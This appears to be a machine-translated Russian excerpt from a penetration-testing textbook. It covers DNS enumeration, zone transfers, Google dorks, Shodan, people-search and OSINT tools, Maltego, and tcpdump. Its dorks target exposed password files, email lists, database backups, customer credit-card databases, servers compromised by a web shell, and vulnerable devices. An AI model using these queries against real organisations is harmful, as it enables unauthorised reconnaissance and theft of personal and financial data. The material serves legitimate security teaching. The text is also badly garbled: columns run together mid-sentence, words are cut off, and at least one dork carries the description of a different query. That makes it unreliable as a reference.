Почта google.com обрабатывается 50 alt4.aspmx.l.google.com.
Почтой google.com занимается 20 alt1.aspmx.l.google.com.
host -t ns google.com
сервер имен google.com ns3.google.com.
сервер имен google.com ns4.google.com.
сервер имен google.com ns1.google.com.
сервер имен google.com ns2.google.com.
https://translate.googleusercontent.com/translate_f 38/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Стр.52
имена хостов. Эти имена хостов могут быть обычными именами, которые администраторы используют для
назовите свои серверы, или это могут быть слова из словаря. Всякий раз, когда мы
получить действительный ответ - содержащий IP-адрес - об имени хоста, мы
знал бы, что существует система с таким именем хоста.
Например, администраторы нередко называют свои серверы
по действующим службам; так что для домена mydomain.ext это очень
вероятно найдут следующие имена хостов:
Стр. 53
https://translate.googleusercontent.com/translate_f 39/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
ftp админ cp DNS Программы
localhost Форум календарь поиск скачать
электронная почта
Новости вики постановка удаленный
smtp vpn сеть сервер db
поп ns3 СМИ mx1 форумы
ns1 mail2 Эл. адрес чат хранить
веб-диск новый изображений wap реле
нс2 MySQL img мой файлы
cpanel Старый www1 svn Новостная рассылка
WHM списки интранет mail1 приложение
автообнаружениеслужба поддержки
портал места жить
автоконфигурациямобильный видео доверенное лицоова
м mx глоток Объявления en
imap статический dns2 хозяин Начните
тестовое заданиедокументы api crm SMS
нс бета cdn cms офис
блог магазин статистика резервное копирование
обмен
pop3 sql dns1 mx2 ipv4
После сохранения этого списка в файле dnsdictionary теперь мы можем запускать dnsrecon как
следует:
# dnsrecon -d google.com -D / root / dnsdict -t brt
Результатом будет список доступных имен хостов вместе с их IP-адресами.
(IPv4, а также IPv6). И поскольку вывод слишком длинный, чтобы поместиться здесь, вот
список только обнаруженных имен хостов - 33 из них - с их разрешенными
адреса:
ns1.google.com support.google.com chat.google.com
www.google.com docs.google.com wap.google.com
mail.google.com calendar.google.com sites.google.com
m.google.com web.google.com ads.google.com
Стр.54
https://translate.googleusercontent.com/translate_f 40/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
2. Разрешить перенос зоны в определенные системы : администратору необходимо
для явного ввода IP-адресов систем - например, вторичных
серверы - разрешен доступ к переносу зоны.
3. Разрешить всем : эта опция открыто разрешает перенос зоны на
весь мир.
Именно этот последний вариант может быть опасен для организации. Если перенос зоны
открыто разрешено, хакеры могут использовать его на этапе сбора информации
получить все записи в домене; эти записи покажут все имена хостов,
IP-адреса, услуги и т. Д. Ваша роль в качестве тестера на проникновение заключается в том, чтобы выяснить,
зонная передача разрешена.
Вот как можно попытаться передать зону с помощью команды dig:
Стр.55
https://translate.googleusercontent.com/translate_f 41/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Стр.56
Помимо этих специальных символов, в Google есть то, что называется Advanced
Операторы. Они дополнительно уточняют поиск и позволяют нам ориентироваться на определенные
области веб-страницы и даже для таргетинга на определенные веб-сайты. Кроме того, те
операторы позволяют нам находить файлы определенного типа - файлы, которые могут содержать
конфиденциальная информация, такая как имена пользователей, пароли, информация о кредитных картах и т. д.
Короче говоря, расширенные операторы в основном используются для уточнения результатов поиска; тем не мен
их можно использовать в качестве рычага для обнаружения безопасности
уязвимости.
Синтаксис использования расширенного оператора следующий (обратите внимание на двоеточие после
Оператор):
<оператор>: <поиск_терм>
В следующей таблице перечислены наиболее важные расширенные операторы:
Оператор Пример Функция
название: intitle: кибербезопасность ищет заголовки страниц; он ищет страницы,
заголовки соответствуют заданной строке. (вернуть страницы, чьи
названия включают кибербезопасность )
inurl: inurle: viewtopic.php Ищет URL-адреса; он находит страницы, URL-адреса которых содержат
данная строка. (возвращать страницы, URL-адреса которых содержат
viewtopic.php )
в текст: intext: взлом Ищет только текст страницы. (вернуться страницы
чьи тексты содержат взлом )
тип файла: тип файла: pdf ищет файлы определенных типов. (вернуть только pdf
файлы)
Стр.57
сайт : сайт: semurity.com выполняет поиск на определенном сайте или в домене. (возвращение
страницы в домене semurity.com )
ссылка: ссылка: www.semurity.com ищет сайты, которые имеют ссылку на нашу цель
сайт. Мы можем найти деловых партнеров, единомышленников и
связи. (верните веб-сайты, на которых есть ссылка на
www.semurity.com )
https://translate.googleusercontent.com/translate_f 42/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
По умолчанию Google выполняет поиск в любой из этих трех частей любой веб-страницы -
URL, заголовок и текст (тело). Однако, используя любой из этих трех
операторы заставили бы Google искать только в обозначенной части. И, как
мы увидим, это даст нам достаточно гибкости, чтобы найти определенные
уязвимые страницы.
Кроме того, мы можем комбинировать несколько из этих операторов, чтобы сформировать более
сложные поиски. Ниже приведены несколько примеров, демонстрирующих различные
использование этих операторов:
Пример 1
Если мы хотим найти все файлы php, содержащие в своем теле фразу
«Тест на проникновение в сеть» и в названиях есть фраза «кибербезопасность»,
мы бы набрали:
filetype: php intitle: «кибербезопасность» intext: «тест проникновения в сеть»
Пример 2
Если мы хотим найти файлы asp с URL-адресами со словами «admin» и
Стр.58
Пример 3
Если мы хотим найти все файлы pdf, размещенные на веб-сайте semurity.com, мы должны ввести:
тип файла: pdf сайт: semurity.com
Пример 4
Чтобы найти таблицы Excel (xlsx), содержащие слово «пароль» хоста на
semurity.com, мы должны ввести:
filetype: xlsx site: semurity.com пароль
Пример 5
Если мы хотим найти адреса электронной почты, вот несколько способов их получить.
используя разные операторы Google:
«@ Domain.com»
тип файла адреса электронной почты: csv
тип файла: pst
inurl: тип файла электронной почты: mdb
тип файла: xls inurl: «email.xls»
тип файла: xls имя пользователя пароль электронная почта
Стр.59
Этот придурок находит веб-серверы, зараженные веб-оболочкой «Mister Spy». Он инструктирует движок Google
найти веб-страницы, в URL-адресах которых есть фраза «Мистер Шпион» или фраза
«Mister Spy & Souheyl Bypass Shell» в их теле (текст).
Секретные каталоги
Он содержит запросы, которые находят веб-серверы с доступными каталогами, содержащими
конфиденциальные или секретные файлы. Вот пример:
inurl: "/ wp-content / uploads / db-backup"
Этот придурок находит веб-серверы с WordPress CMS, которые имеют открытые каталоги резервных копий. Это
выполняет поиск сайтов, в URL-адресах которых указан путь «/ wp-content / uploads / db-backup».
Уязвимые файлы
Он содержит запросы, которые находят веб-страницы с известными уязвимостями; эти
уязвимостями могут быть такие вещи, как SQL-инъекция, XSS, удаленное выполнение кода,
и т.д. Вот пример:
intitle: "CJ Link Out V1"
Этот придурок находит веб-страницы, в заголовках которых есть фраза «CJ Link Out V1», которая указывает
продукт CJ Linkout версии 1. Было обнаружено, что этот продукт содержит межсайтовый
Уязвимость сценариев (XSS).
Уязвимые серверы
Он содержит поисковые запросы, которые выявляют веб-серверы с известными уязвимостями.
или страницы, предоставляющие доступ к веб-серверу. Вот пример:
тип файла: php inurl: vAuthenticate
Этот придурок находит веб-страницы PHP, в URL которых есть слово «vAuthenticate». vAuthenticate
это сценарий, который позволяет создавать учетные записи пользователей. По умолчанию есть два администратора с
легко угадываемые пароли.
Сообщения об ошибках
Он содержит поисковые запросы, которые находят веб-страницы с сообщениями об ошибках и журналами.
которые раскрывают так много информации о базовом веб-сервере или
заявление. Ниже приведен пример:
intitle: «Упс! Произошла ошибка».
Этот придурок ищет веб-страницы, в заголовках которых есть фраза «Упс! Это был
https://translate.googleusercontent.com/translate_f 44/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Стр. 60
ошибка." Эта фраза указывает на страницы с сообщениями об ошибках, которые иногда раскрывают базу данных.
реквизиты для входа.
Различные онлайн-устройства
Он содержит запросы, которые находят устройства IoT (Интернет вещей) - устройства.
подключены непосредственно к Интернету через веб-интерфейс, например, принтеры и
веб-камеры. Вот пример:
inurl: guestimage.html
Этот придурок находит веб-страницы, в URL-адресах которых указано имя «guestimage.html». Эти страницы
обычно указывают на наличие онлайн-камер Mobotix.
Обнаружение веб-сервера
Он содержит запросы, которые находят веб-серверы с определенной службой и версией. Для
пример:
intitle: "BadBlue: веб-сервер для обмена файлами, который может использовать каждый"
Этот придурок находит файлы журналов - файлы с расширением .log - которые содержат ключевое слово «имя пользователя».
и «замазка». Putty - это клиент SSH. Возвращенные результаты представляют собой файлы журнала Putty с различными
информация, включая имена пользователей.
Стр.61
на FTP-сервер.
https://translate.googleusercontent.com/translate_f 45/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Этот придурок находит незащищенные незащищенные файлы базы данных с именем midicart.mdb . MIDICART - это
приложение корзины покупок для сайтов ASP и PHP. Когда его база данных незащищена, она
может раскрыть конфиденциальную информацию о покупателях, включая информацию об их кредитной корзине.
Этот придурок находит открытые списки каталогов, которые включают отчеты Tripwire. Tripwire - это программное обеспечение
который выполняет проверку целостности на сервере, отслеживая изменения в файлах и системных процессах.
Этот придурок находит страницы входа в систему OAuth. Он просто возвращает страницы, в заголовках которых есть фраза
«Вход на сервер OAuth».
Консультации и уязвимости
Он содержит поисковые запросы, которые находят уязвимые серверы; однако эти запросы
формируются через консультативные советы. Вот пример:
intitle: "Веб-консоль Nport"
Этот придурок находит веб-страницы, в заголовках которых есть фраза «Веб-консоль Nport», которая
указывает на наличие уязвимых устройств Moxa.
Стр.62
Shodan - это поисковая машина для устройств IoT (Интернет вещей); то есть для
устройства, подключенные к Интернету. Эти устройства подключены к Интернету через
IP-адрес и веб-сервер, который предлагает удаленное управление или
административная панель. Shodan в основном находит те устройства, у которых есть свой Интернет.
серверы (http / https) на портах 80, 8080, 443 или 8443. Он также может находить устройства
прослушивание других портов, таких как Telnet, SSH, SNMP и многие другие. Shodan
был создан Джоном Мазерли в 2009 году с целью поиска устройств.
подключен к Интернету.
Чаще всего веб-серверы Интернета вещей предоставляют своим владельцам интерфейсы и
консоли для удаленного контроля и управления этими устройствами. И
риск безопасности возникает, когда нет надлежащей системы аутентификации.
И это даст злоумышленникам возможность контролировать устройство и управлять им.
Shodan может находить такие устройства, как маршрутизаторы, коммутаторы, веб-камеры, светофоры и т. Д.
Системы SCADA, системы отопления, холодильники и т. Д. В отличие от Google Search,
Shodan требует, чтобы вы зарегистрировали бесплатную учетную запись, чтобы получить доступ ко многим из св
Особенности; и если вы получите доступ ко всем функциям, вам даже понадобится платный
членство.
После входа в Shodan нажмите « Исследовать» в главном меню. Ты увидишь
три основных раздела с этими названиями: " Избранные категории" , " Самые популярные" и
Недавно опубликованный .
https://translate.googleusercontent.com/translate_f 46/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Стр.63
2. Базы данных
https://translate.googleusercontent.com/translate_f 47/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Стр.64
3. Видеоигры
1. Веб-камера
Это поисковый запрос: Сервер: SQ-WEBCAM - который
в основном ищет веб-камеры SQ, представленные в Интернете.
Возвращенные результаты могут включать незащищенные веб-камеры.
2. Кулачки
Это поисковый запрос: linux upnp avtech - который ищет
для камер AVTech онлайн. Эти камеры имеют ОС Linux.
Наконец, раздел "Недавно опубликованные" включает поисковые запросы недавно.
представлен участниками.
Стр.65
Pipl - крупнейшая в мире поисковая система для людей. Согласно Piple Inc.,
«Pipl - это место, где можно найти человека, стоящего за адресом электронной почты, именем пользователя в соц
или номер телефона. Опрашивает информацию о человеке из социальных сетей.
источники, такие как Facebook, Linkedin, Twitter и Google Plus, а также
с сайтов электронной коммерции, таких как Amazon.
https://translate.googleusercontent.com/translate_f 48/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Стр.66
https://translate.googleusercontent.com/translate_f 49/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
BuiltWith, основанная в различные
который предоставляет 2007 году Гэри Брюером, австралийская
интернет-услуги; в частности,компания.
он предоставляет информацию
и анализ веб-технологий, используемых веб-сайтами по всему миру. Ты
могут запросить свою базу данных, чтобы узнать, какие базовые технологии используются в определенных
сайт построен с использованием.
Технологии, которые может предоставить BuiltWith, относятся к разным категориям:
например, системы управления контентом, библиотеки JavaScript, мобильные устройства
Технологии, Сети доставки контента, Виджеты, Технологии кодирования,
Технологии документирования, технологии, обеспечивающие функцию агрегирования,
и т.п.
Стр.67
Netcraft - веб-анализатор
www.netcraft.com
Netcraft предоставляет информацию и анализ веб-серверов. Это было
исследует Интернет с 1995 года. Британская компания Netcraft ltd.
основана в 1987 Майком Преттейоном. Он предлагает различные услуги веб-безопасности,
такие как тестирование безопасности веб-приложений и сканирование безопасности PCI. Он также предлагает
мощная и сложная панель инструментов для защиты от фишинга в браузере, свободная от
плата. Панель инструментов может работать в Firefox, Chrome и IE.
Что делает Netcraft привлекательным для хакеров и тестеров на проникновение, так это их
Механизм интеллектуального анализа данных в Интернете. Их движок отслеживает Интернет в Интернете
сервисов и собирает информацию о веб-серверах, операционных системах,
хостинговые компании, интернет-провайдеры, а иногда и время безотказной работы. Они хранят все это
информация в собственных базах данных и отслеживает все изменения. То есть пользователь
можно увидеть историю базовых технологий определенного веб-сайта.
https://translate.googleusercontent.com/translate_f 50/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Простой способ использовать возможности Netcraft - перейти в текстовое поле под заголовком
« Что это за сайт? »И введите адрес веб-сайта, как показано
Стр.68
следующее изображение:
Поисковые системы постоянно сканируют Интернет и индексируют все связанные с Интернетом данные или
файлы. Каждый файл доступен по его URL-адресу, который во многих случаях
публикуется веб-приложением при создании этого файла. Таким образом, поиск
движки могут содержать доступные для поиска индексы файлов, которые не предназначались для
общественные. Вопрос только в том, как умело запрашивать поисковые системы -
в частности Google, чтобы раскрыть нам эти файлы. У нас есть возможность использовать
поисковые запросы вручную для получения желаемых результатов или с помощью автоматизированного инструм
это делает работу от нашего имени.
Стр.69
Поисковая система Google очень гибкая, когда дело доходит до настройки поиска.
https://translate.googleusercontent.com/translate_f 51/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
запросы. Есть много встроенных операторов, которые можно использовать для настройки
наши критерии поиска и дают нам нестандартные результаты. Что такое
К нашему обсуждению относятся следующие операторы:
тип файла
сайт
doc, docx, xls, xlsx, ppt, pptx, pps, ppsx, odt, ods, odp, pdf, txt, rtf
Если мы предположим, что наш целевой домен - example.com, тогда нам нужно выпустить
следующий запрос, чтобы найти один конкретный тип файла:
Например,
site: example.com тип файла: pdf ИЛИ тип файла: документ ИЛИ тип файла: docx ИЛИ
тип файла: xls ИЛИ тип файла: xlsx ИЛИ тип файла: ppt ИЛИ тип файла: pptx ИЛИ
тип файла: pps ИЛИ тип файла: ppsx ИЛИ тип файла: odt ИЛИ тип файла: ods ИЛИ
тип файла: odp ИЛИ тип файла: txt ИЛИ тип файла: rtf
Стр.70
Metagoofil - это инструмент с открытым исходным кодом, который может искать в Интернете определенный файл
типы в определенном домене, загрузите эти файлы в локальную систему, а затем,
извлекать и анализировать метаданные внутри этих файлов. Мета-данные включают в себя вещи
например, имя пользователя, адрес электронной почты, дата создания и т. д., которые могут помочь в
профилирование целевой организации. Metagoofil устанавливается на Kali Linux
по умолчанию. Использовать этот инструмент на самом деле легко и просто. Например,
скачать не более 50 файлов разных типов - pdf, doc,
docx, xls, xlsx и txt - из домена example.com и сохраните их в
Папку «mydirectory», мы введем следующую команду:
Инструмент Maltego
Этот инструмент - чрезвычайно мощный инструмент для автоматизации разведки.
Процесс сбора. Он разработан компанией Paterva ( www.paterva.com ).
И он доступен в нескольких версиях: бесплатная версия сообщества и другие.
коммерческие версии. Согласно их веб-сайту:
«Maltego - это интерактивный инструмент интеллектуального анализа данных, который отображает
графики для анализа ссылок. Инструмент используется в онлайн-расследованиях на
нахождение взаимосвязей между частями информации из различных
источники, расположенные в Интернете.
Maltego использует идею преобразований для автоматизации процесса
запросы к различным источникам данных. Затем эта информация отображается на
граф на основе узлов, подходящий для анализа ссылок ».
Maltego предустановлен в Kali Linux. Но чтобы работать эффективно
Стр.71
с его помощью нам нужно понять три основных понятия, которые образуют сердце и
ядро Мальтего. И эти концепции: (1) Сущности , (2) Преобразования и (3)
Машины .
Сущности
Сущность представляет собой один единственный объект, и этот объект может быть цифровым (например,
IP-адрес или веб-сайт), личный (например, имя человека или телефон
число), географическое (например, название города или страны) и т. д.
Трансформирует
Преобразование - это правило действия или процесс, который применяется к отдельному объекту.
для создания других сущностей. Другими словами, преобразование принимает входные данные (
entity), применяет некоторые действия и производит вывод (некоторые объекты).
Машины
Машина - это группа предопределенных преобразований. А цель машины -
для автоматизации процесса применения различных преобразований. Вместо тебя
вручную применяя одно преобразование за другим, вы бы выбрали машину
и вместе запускает набор преобразований.
Бег и изучение Мальтего
Чтобы запустить Maltego, введите в терминале следующую команду:
https://translate.googleusercontent.com/translate_f 53/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
# мальтего
Вы можете запустить бесплатную версию для сообщества; однако в нем есть
ограничение, которое заключается в том, что оно ограничивает количество результатов любого конкретного
преобразовать максимум до 12 результатов. Первый экран, который приветствует вас, когда
Стр.72
Вы открываете Maltgeo - это окно входа. Если это ваш первый запуск
Мальтего, сначала вам нужно будет зарегистрироваться.
Первое, что здесь привлекает внимание, - это верхняя лента; среди всех
доступны вкладки, три дадут нам доступ к основному ядру Maltego; а также
это три: Сущности, Преобразования и Машины. Каждая из этих вкладок
позволит нам просматривать, редактировать и управлять соответствующим компонентом:
Вкладка Entities
Стр.73
https://translate.googleusercontent.com/translate_f 54/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Компания, DNS-имя, адрес электронной почты, хэш, запись MX и т. Д .:
Вкладка "Преобразования"
Нажав на преобразования
Вкладка покажет нам различные кнопки, среди которых (1) Transform Hub: это
панель, где отображаются доступные сторонние плагины, (2) Преобразовать
Менеджер: дает возможность просматривать и редактировать доступные преобразования и (3)
Новое локальное преобразование: здесь вы можете создавать новые преобразования. С тех пор, как мы
не заинтересованы в просмотре встроенных преобразований, нажмите «Преобразовать»
Менеджер":
Стр.74
Вкладка "Машины"
На вкладке "Машины" мы
https://translate.googleusercontent.com/translate_f 55/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
можно увидеть четыре кнопки: (1) Run Machine: для запуска машины, (2) Stop all
Машины: чтобы положить конец всем работающим машинам, (3) Новая машина: где можно
создать новую машину и (4) управлять машинами: где вы можете просматривать и
редактировать доступные машины. Нажмите "Управление машинами", чтобы просмотреть некоторые из
доступные машины:
Стр.75
маленький значок для создания нового графика; нажмите здесь. Вы должны что-то увидеть
аналогично изображению ниже. Главное окно пустое и белое; и к
правильно, это так называемая «палитра сущностей». Показаны все доступные сущности
- в категориях - внутри палитры сущностей.
Вы увидите, что значение по умолчанию для этого объекта - paterva.com, которое является
доменное имя компании, разработавшей Maltego. Давай изменим это на
https://translate.googleusercontent.com/translate_f 56/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
semurity.com
имя внутри его, дважды щелкнув
текстового поля. этот
Послеобъект
этогоищелкните
отредактировав
правой домен.
кнопкой мыши объект, чтобы получить список.
применимых преобразований. Здесь следует отметить, что у каждой сущности есть свои собственные
список преобразований, применимых только к нему. Щелкнув правой кнопкой мыши, вы увидите значок
преобразования сгруппированы по категориям. Нажмите «Все преобразования», чтобы увидеть все
список:
Стр.76
Как видите, Maltego удалось получить четыре результата - четыре объекта рейтинга.
тип DNS Имя: webmail.semurity.com, mail.semurity.com,
ftp.semurity.com и .semurity.com (имя хоста одного и того же
name в качестве доменного имени). Теперь мы можем повторить тот же процесс снова, но
на этот раз мы применяем преобразование к одному из сгенерированных выходов. Итак, начнем
щелкните правой кнопкой мыши объект DNS Name со значением mail.semurity.com и
выберите преобразование « В IP-адрес [DNS] » - что делает обычный DNS
запрос, чтобы получить IP-адрес webmail.semurty.com. Мы увидим это
Maltego сгенерировал новую сущность типа « IPv4-адрес » с
значение « 170.10.163.106 »:
Стр.77
https://translate.googleusercontent.com/translate_f 57/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Теперь вы можете повторять этот процесс снова и снова столько раз, сколько вам нужно.
чтобы получить различную информацию о вашей цели.
Более глубокий взгляд на сущности и преобразования
Сущности, которые мы сейчас рассмотрим, подпадают под категорию под названием
« Инфраструктура ». Ниже перечислены 9 значимых организаций:
1. AS (автономная интернет-система)
Стр.78
3. Домен
https://translate.googleusercontent.com/translate_f 58/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Этот объект представляет собой единый домен. Домен обычно представляет собой зонтик, под которым
могут существовать либо поддомены, либо хосты. Например, semurity.com, google.com, youtube.com.
все домены. Следующие важные преобразования применимы к объекту домена:
Стр.79
Двигатель] имя.
На адрес электронной почты [из whois Сначала он выполняет поиск в WHOIS, а затем проверяет, есть ли
Информация] любые адреса электронной почты в данных WHOIS.
На номера телефонов [используя Ищет в Google номер телефона, связанный с вводом
Поисковый движок] домен.
На номера телефонов [из whois Сначала он выполняет поиск в WHOIS, а затем проверяет наличие каких-либо
Информация] номер телефона в данных WHOIS.
На веб-сайт [Быстрый поиск] Simple проверяет, существует ли сервер www во входном домене.
Например, входным доменом был semurity.com , он проверяет,
www.semurity.com существует.
4. IPv4-адрес
https://translate.googleusercontent.com/translate_f 59/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
На номер телефона [с помощью whois Сначала он выполняет запрос WHOIS, а затем проверяет возвращенные
Информация] Данные WHOIS для любого номера телефона
На веб-сайт с упоминанием IP Is использует поисковую систему Bing для поиска веб-сайтов, использующих тот же
[Bing] введите IP-адрес.
Создает диапазон сетевых IP-адресов с использованием классической сетевой маски класса C.
В Netblock [с использованием естественного
границы]
5. Запись MX
Стр. 80
6. NS Record
7. Сетевой блок
Стр. 81
https://translate.googleusercontent.com/translate_f 60/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
8. URL
К объектам [IBM Watson] он проверяет такие объекты, как имена людей, названия компаний, телефон
числа и местоположения, использующие NER (распознавание именованных сущностей)
техника IBM Watson.
На номера телефонов [найдены на Он находит любые телефонные номера на этой веб-странице.
эта веб-страница]
На веб-сайт [ссылки в этом Интернете Он находит любые ссылки на этой веб-странице.
страница]
Редакторам Википедии Если URL-адрес был страницей Википедии, он генерирует список пользователей.
кто редактировал страницу
К изображениям с URL Он находит изображения на этой веб-странице и генерирует объекты изображения
тип.
На адреса электронной почты [найденоОн
на находит любой адрес электронной почты на этой веб-странице.
эта веб-страница]
9. Веб-сайт
Стр.82
https://translate.googleusercontent.com/translate_f 61/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Стр. 83
https://translate.googleusercontent.com/translate_f 62/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
зашифрованный
это можно сделатьтрафик
двумясспособами:
целью анализа его содержимого.
в первом Есть
случае используется подделка
сертификат; это вызывает предупреждение браузера, которое жертва должна
принимать. В прошлом многие люди легко могли попасть в этот тип
атака. Однако современные браузеры усложнили задачу подделки.
сертификаты, которые необходимо принять. Второй способ предполагает использование
Сообщение HTTP Redirect, которое происходит до SSL / TLS
рукопожатие; это называется SSL Stripping, и его цель - сделать
браузер делает всю сессию по HTTP вместо HTTPS.
Стр. Решебника 84
https://translate.googleusercontent.com/translate_f 63/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Стр.85
или сохраняет их в файл. Последний представляет собой многофункциональный инструмент на основе графическ
два инструмента совместимы друг с другом; файлы, сохраненные Tcpdump, могут быть прочитаны
от Wireshark и наоборот.
Tcpdump
Tcpdump - это инструмент командной строки, который входит в состав большинства UNIX / Linux.
ОС. Первоначально он был разработан группой сетевых исследований в Беркли.
Лаборатория в 1988 году. В 1999 году другие участники создали веб-сайт.
www.tcpdump.org, который содержит полную документацию и исходные коды
этот инструмент вместе с библиотекой libpcap C / C ++.
Вы можете запустить Tcpdump для захвата живых пакетов по сети, и в этом случае
Tcpdump может либо вывести эти пакеты в окно терминала, либо сохранить
их в файле для последующего анализа. В качестве альтернативы вы можете запустить Tcdump в автономном режи
чтение пакетов из определенного файла и выгрузка их на терминал
окно. Поскольку это командная строка, Tcpdump может быть написан по сценарию и его вывод
анализируется скриптами, написанными на таких языках, как shell, python или perl.
Захват пакетов без содержимого
Если вы запустите Tcpdump со значениями по умолчанию - без заданных параметров, он будет
начать обнюхивать все доступные интерфейсы и сбрасывать заголовки захваченных
пакеты в окне терминала. Все, что вам нужно, это ввести следующее:
# tcpdump
Результат будет примерно таким:
tcpdump: подробный вывод подавлен, используйте -v или -vv для полного декодирования протокола
прослушивание eth0, тип канала EN10MB (Ethernet), размер захвата 262144 байта
00: 38: 37.161537 ARP, запрос, у кого есть 192.168.0.100, сообщить _gateway, длина 46
00: 38: 37.911700 IP kali.33212> google-public-dns-a.google.com.domain: 27207+ PTR?
100.0.168.192.in-addr.arpa. (44)
00: 38: 37.964182 IP-адрес google-public-dns-a.google.com.domain> kali.33212: 27207 NXDomain
0/0/0 (44)
00: 38: 38.026015 IP kali.50702> google-public-dns-a.google.com.domain: 23605+ PTR?
1.0.168.192.in-addr.arpa. (42)
00: 38: 38.081610 IP-адрес google-public-dns-a.google.com.domain> kali.50702: 23605 NXDomain
0/0/0 (42)
00: 40: 40.685263 IP kali.36316> 185.91.98.18.http: Flags [.], Ack 1153, win 254, options
[nop, nop, TS val 2393669468 ecr 1869232191], длина 0
00: 40: 40.690676 IP 185.91.98.18.http> kali.36316: Флаги [.], Ack 865, win 517, параметры
[nop, nop, TS val 1869243369 ecr 2393628603], длина 0
Стр.86
https://translate.googleusercontent.com/translate_f 64/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Если вы хотите указать определенный интерфейс для прослушивания (например, eth0), вы можете запустить
Tcpdump с параметром -i и дайте ему имя интерфейса:
# tcpdump -i eth0
Однако если по каким-то причинам вы не могли вспомнить название
интерфейса, вы можете легко попросить Tcpdump перечислить доступные интерфейсы как
следует:
# tcpdump -D
Результат будет примерно таким:
1.eth0 [работает, работает]
2. любой (Псевдоустройство, которое захватывает все интерфейсы) [Работает, работает]
3.lo [Up, Running, Loopback]
4.nflog (интерфейс журнала сетевой фильтрации Linux (NFLOG))
5.nfqueue (интерфейс очереди сетевого фильтра Linux (NFQUEUE))
6. usbmon1 (шина USB №1)
Стр. Решебника 87
В выходных данных выше мы видим пакет ICMP. Первая строка - это то, что Tcpdump
были бы напечатаны, если бы мы использовали параметр по умолчанию (пакеты без содержимого).
Есть временная метка, за которой следует протокол (IP), адрес источника (kali),
адрес назначения (ham02s12-in-f46.1e100.net), протокол выше IP
слой, который в данном случае является ICMP, и, наконец, немного информации об этом
Пакет ICMP. Ниже этой строки мы видим HEX-дамп пакета. Каждый
строке в дампе предшествует индекс, который также находится в шестнадцатеричном формате, который
указывает индекс первого байта в строке.
В дополнение к дампу HEX, Tcpdump может показать нам ASCII
представление пакета. Мы можем сделать это, выполнив:
# tcpdump -i eth0 -X
01: 59: 19.082271 IP ham02s12-in-f46.1e100.net> kali: эхо-ответ ICMP, id 1737, seq 859,
длина 64
https://translate.googleusercontent.com/translate_f 65/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
0x0000: 4500 0054 0000 0000 3101 0993 acd9 122e E..T .... 1 .......
0x0010: c0a8 0067 0000 9090 06c9 035b c7b0 f35b ... g ....... [... [
0x0020: 0000 0000 eb6b 0000 0000 0000 1011 1213 ..... k ..........
0x0030 : 1415 1617 1819 1a1b 1c1d 1e1f 2021 2223 .............! "#
0x0040: 2425 2627 2829 2a2b 2c2d 2e2f 3031 3233 $% & '() * +, -. / 0123
Когда дело доходит до ASCII, мы знаем, что не каждый байт в сети может быть
преобразован в ASCII. Итак, что делает Tcpdump, так это проверяет, каждый ли байт
попадает в диапазон ASCII (т. е. диапазон символов, читаемых человеком),
и если это так, он печатает фактический символ ASCII; в противном случае печатается точка (.).
Стр.88
https://translate.googleusercontent.com/translate_f 66/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Стр.89
# tcpdump -r mypackets.pcap -X
Контроль количества и длины пакетов
При выполнении записи в реальном времени по умолчанию Tcpdump сохраняет
бессрочное прослушивание пакетов; и единственный способ остановить это - послать сигнал
Ctrl ^ C. Кроме того, Tcpdump в Kali Linux захватывает максимум 262144 байта.
с начала каждого пакета. Это число обычно превышает
стандартная длина любого пакета TCP / IP. Однако, если вас интересует
захват определенного количества байтов - скажем, 512 или 1024, для
Например, есть способ изменить это значение по умолчанию. И в таком случае Tcpdump
захватит только указанное количество байтов с начала каждого
пакет, а остальные игнорировать.
Параметры, которые позволяют нам изменить это поведение по умолчанию:
-c <нет> указывает количество пакетов для прослушивания.
-s <len> указывает максимальный размер захвата.
Допустим, мы заинтересованы в захвате только 100 пакетов, и мы хотим
выгружать только первые 512 байт из каждого пакета; мы выпустим следующие
команда:
# tcpdump -i eth0 -c 100 -s 512
Пакетный фильтр Беркли (BPF)
До сих пор мы видели, как Tcpdump - в беспорядочном режиме - захватывает все
пакеты, поступающие на сетевой интерфейс, без исключения. Однако если вы
заинтересованы только в определенных типах пакетов, получение всего трафика может быть обременительным
на ваших ресурсах, так как каждый пакет должен обрабатываться ОС с использованием ЦП
и память. Итак, ребята из Berkely Labs изобрели своего рода фильтрацию
механизм - с определенным синтаксисом - который может быть применен с Tcpdump к
захватывать только интересующие вас пакеты. Место для ввода вашего BPF
фильтр всегда находится в конце командной строки tcpdump:
# tcpdump [<параметры>] [<bpf_filter>]
Синтаксис фильтра BPF следует простому правилу: <квалификатор> <значение>
Квалификатор - это ключевое слово, и это может быть одна из трех категорий:
Стр. 90
https://translate.googleusercontent.com/translate_f 67/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Ключевое
Ключевые слово
слова direction вставляется перед типом. Таким образом
направления:
src - источник.
dst - пункт назначения.
Протокол : это просто позволяет захватывать пакеты определенного
протокол. Некоторые из доступных ключевых слов в этой категории:
